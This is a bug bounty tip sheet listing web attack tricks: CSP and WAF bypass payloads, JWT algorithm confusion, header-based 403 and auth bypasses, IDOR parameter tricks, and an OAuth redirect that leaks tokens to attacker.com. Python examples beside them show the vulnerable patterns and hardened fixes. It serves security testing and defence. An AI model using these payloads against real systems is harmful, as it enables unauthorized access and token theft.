Book of BugBounty Tips
Bypasses
It's possible to bypass #CSP with the following:
#JSONP: <script src="https://trustedsite/jsonp?callback=payload">
#AngularJS: <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
Encountered AWS WAF? Just add "<!" (without quotes) before your payload and bypass that WAF. :) e.g. <!alert(1) #BugBounty #bugbountytip #bugbountytips
If the target is using @Cloudflare, dig in their DNS records and search for the origin's IP address. If you attack the application directly by its IP, Cloudflare's WAF will not be there.
Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.
Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ #bugbountytip
Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: the admin role ID is 1. Try to set your ID to 0.9 and it may bypass the auth check, as the system will round up after the auth check. #bugbountytip #bugbounty
When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.
CSP Bypass, script-src 'self' data: - https://twitter.com/404death/status/1191222237782659072
Want to bypass a file extension restriction? Try HTTP Parameter Pollution on the filename parameter.
I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips The last /setup/ endpoint was as the attacker while the first one is as the victim.
OTP bypass - https://twitter.com/HackerHumble
Sometimes you find those PATHs that forward to a login page and you can't see the content inside them. (ex: /path/to/secret --> Google login)
Cloudfront Bypass -
403 Bypass:
https://twitter.com/RathiArpeet/status/1315593774773334016
https://twitter.com/hackerscrolls/status/1254701239360720900
Tools -
https://github.com/lobuhi/byp4xx
https://github.com/Raywando/4xxbypass
https://github.com/sting8k/BurpSuite_403Bypasser
If the "Origin" header does not work, try "x-[org name]-origin"; the same thing applies to all headers!! e.g. x-uber-origin, x-uber-host, etc.
#bugbounty I was able to bypass the filter on OAuth through fuzzing with URL-encoded chars. Found that the website adds / before %5b when it redirects the token. Example: target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect token to: http://Attacker.com/%5b.target.comrget.com?token=…...
Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.
What worked was... \udfff -> � -> ?
Therefore... {"redirectUri":"https://attacker\udfff@[victim]/"}
Equals... Location: https://attacker?@[victim]/
JWT Token Bypasses #2:
1. Capture the JWT token.
2. If the algorithm is RS256, change it to HS256 and sign the token with the public key (which you can get by visiting the JWKS URI; mostly it will be the public key from the site's HTTPS certificate). (1/2)
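A verifier that closes the RS256-to-HS256 confusion described in the tip above, added here and not part of the original tweet: the weak version takes the algorithm from the token header, the hardened one pins it from server configuration. The rsa_verify callback and the public-key bytes are assumptions for the demo, and make_token exists only to build test tokens.

```python
import base64
import hashlib
import hmac
import json

def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def make_token(payload, alg, key=b""):
    """Constructed for the demo: an HS256-signed or unsigned ('none') token."""
    h = _b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    p = _b64url(json.dumps(payload).encode())
    sig = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest() if alg == "HS256" else b""
    return f"{h}.{p}.{_b64url(sig)}"

def weak_verify(token, key):
    """Confused verifier: picks the algorithm from the attacker-controlled header."""
    h, p, s = token.split(".")
    alg = json.loads(_unb64url(h))["alg"]
    if alg == "HS256":                       # the RSA public key bytes become the HMAC secret
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _unb64url(s)):
            return json.loads(_unb64url(p))
    raise ValueError("bad signature")

def verify(token, expected_alg, key, rsa_verify=None):
    """Hardened: the algorithm is pinned by server configuration, never read from the token."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_unb64url(h))
    except ValueError:
        raise ValueError("malformed token")
    if header.get("alg") != expected_alg:   # also rejects 'none' and any other downgrade
        raise ValueError(f"alg {header.get('alg')!r} rejected; verifier pinned to {expected_alg}")
    signing_input = f"{h}.{p}".encode()
    if expected_alg == "HS256":
        ok = hmac.compare_digest(hmac.new(key, signing_input, hashlib.sha256).digest(), _unb64url(s))
    elif expected_alg == "RS256":
        # rsa_verify(public_key, data, signature) -> bool is supplied by the caller (assumed,
        # e.g. backed by the cryptography package); key must then be an RSA public key.
        ok = rsa_verify(key, signing_input, _unb64url(s))
    else:
        raise ValueError("unsupported alg")
    if not ok:
        raise ValueError("bad signature")
    return json.loads(_unb64url(p))
```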
Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header.
POST /admin/deleteUser HTTP/1.1 -> 403
POST / HTTP/1.1
X-Original-URL: /admin/deleteUser -> 200 OK
Bypass Success! #bugbounty #bugbountytip
Price Manipulation - https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20
{"id":111} --> 401 Unauthorized
{"id":{"id":111}} --> 200 OK
POST /api/get_profile Content-Type: application/json {"user_id":,"user_id":}
GET /api_v1/messages?user_id=VICTIM_ID --> 401
GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK
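The ID handling behind the decimal-rounding tip above and the duplicated-parameter and nested-object tips just above, as an added example that is not from any of the quoted tweets: a vulnerable lookup that compares the float but rounds for the fetch, beside strict parsing that gives the authorization check and the data access one canonical value. ADMIN_ID and RECORDS are constructed sample data.

```python
import json
import re
from urllib.parse import parse_qsl
ADMIN_ID = 1
RECORDS = {1: "admin record", 2: "user record"}   # constructed sample data
def weak_lookup(raw_id, is_admin):
    """Vulnerable pattern from the tip: the check sees the float, the lookup rounds it."""
    requested = float(raw_id)                      # "0.9" -> 0.9
    if requested == ADMIN_ID and not is_admin:     # 0.9 != 1, so the check passes
        raise PermissionError("admin record")
    return RECORDS[round(requested)]               # round(0.9) == 1: admin record leaks

ID_RE = re.compile(r"0|[1-9][0-9]*")               # one canonical spelling per integer
def parse_id(raw):
    """Accept only a canonical decimal integer; '0.9', '1.0', '01' and ' 1' are all rejected."""
    if not isinstance(raw, str) or not ID_RE.fullmatch(raw):
        raise ValueError("id must be a canonical integer, got %r" % (raw,))
    return int(raw)

def safe_lookup(raw_id, is_admin):
    """Hardened: parse strictly once and use that same value for both check and access."""
    requested = parse_id(raw_id)
    if requested == ADMIN_ID and not is_admin:
        raise PermissionError("admin record")
    return RECORDS[requested]

def id_from_query(query, name):
    """A repeated parameter (?user_id=a&user_id=b) is an error, not a first/last pick."""
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]
    if len(values) != 1:
        raise ValueError("%s must appear exactly once, got %d" % (name, len(values)))
    return parse_id(values[0])

def _reject_duplicate_keys(pairs):
    keys = [k for k, _ in pairs]
    if len(keys) != len(set(keys)):
        raise ValueError("duplicate JSON key")
    return dict(pairs)

def id_from_json(body, name):
    """Reject nested objects ({"id":{"id":111}}), floats, bools and duplicate keys."""
    obj = json.loads(body, object_pairs_hook=_reject_duplicate_keys)
    if not isinstance(obj, dict):
        raise ValueError("body must be a JSON object")
    value = obj.get(name)
    if isinstance(value, bool) or not isinstance(value, int):
        raise ValueError("%s must be an integer, got %r" % (name, value))
    return value
```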
How to find authentication bypass vulnerabilities. Focus: I added headers.
Request: GET /delete?user=test HTTP/1.1
Response: HTTP/1.1 401 Unauthorized
Request: GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1
Response: HTTP/1.1 302 Found
CSP -
So: Site allows external '.css' stylesheets? Inject your XSS into your local 'style.css' and call it from external: "<svg><link href=//evil.com/style.css>" XSS will be injected in the HTML! (CSP is on? but no style-src?) so hit the box dude! #bugbounty #infosec
https://twitter.com/iam_j0ker/status/1303658167205728256?s=20
CSP - Hate CSP? Me too. I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff changed the state to P5 (Content Spoofing).
But I can raise it again to P3 (Iframe Injection) and it gets Triaged.
<iframe src= blocked by CSP
Solution:
<iframe srcdoc=
Auth bypass tip:
/api/ -> 403
Fuzzing -> not working
Try: /api/application.wadl?detail=true
Found:
/api/etc/projects/{id}
/api/etc/users/{id}
/api/etc/admin/
Impact:
[ + ] PII info disclosure
[ + ] Sensitive info leak
[ + ] Access admin endpoint
#bugbountytips
1. Found a subdomain with a 404 error
2. Added /api ==> 401 error
3. Using FFUF, found the /api/v2/users endpoint. But still forbidden.
4. Bypass API protection using / ===> //api/v2/users
Boom!! PII of internal user disclosed. #bugbounty #cybersecurity #infosec #bugbountytips
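The X-Original-URL, X-Custom-IP-Authorization and //api/v2/users tips above all come down to the access check seeing a different path or identity than the one the backend actually serves. This added example (not from the quoted tweets) shows a raw-string prefix check beside one that canonicalises the effective path, plus an edge scrub and a detection helper. PROTECTED_PREFIXES is a constructed policy, and X-Rewrite-URL is an assumed second override header name that is not on this page.

```python
import posixpath
import re
from urllib.parse import unquote

# Request headers some frameworks honour to rewrite the routed path (X-Rewrite-URL is assumed).
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")
# Headers that let a client assert its own source address; the name comes from the tip above.
TRUST_HEADERS = ("x-custom-ip-authorization",)
PROTECTED_PREFIXES = ("/api", "/admin")          # constructed sample policy

def canonical_path(raw_path):
    """Decode, collapse repeated '/' and resolve '.'/'..' so '//api/v2/users' == '/api/v2/users'."""
    path = unquote(raw_path.split("?", 1)[0].split("#", 1)[0])
    path = re.sub(r"/+", "/", "/" + path)
    return posixpath.normpath(path)

def weak_is_protected(raw_path):
    """Vulnerable check: matches the raw string, so '//api/v2/users' is not 'protected'."""
    return raw_path.startswith(PROTECTED_PREFIXES)

def effective_path(raw_path, headers, honour_overrides):
    """Return the path the backend will actually route, including any honoured override."""
    lowered = {k.lower(): v for k, v in headers.items()}
    path = raw_path
    if honour_overrides:
        for name in OVERRIDE_HEADERS:
            if name in lowered:
                path = lowered[name]
                break
    return canonical_path(path)

def is_protected(raw_path, headers, backend_honours_overrides=True):
    """Hardened check: authorise the canonical, effective path, not the raw request line."""
    path = effective_path(raw_path, headers, backend_honours_overrides)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)

def scrub_edge_headers(headers):
    """At the internet-facing edge, drop routing and trust headers a client should never set."""
    blocked = OVERRIDE_HEADERS + TRUST_HEADERS
    return {k: v for k, v in headers.items() if k.lower() not in blocked}

def suspicious_headers(headers):
    """Detection: header names worth alerting on when they arrive from an untrusted source."""
    return sorted(k for k in headers if k.lower() in OVERRIDE_HEADERS + TRUST_HEADERS)
```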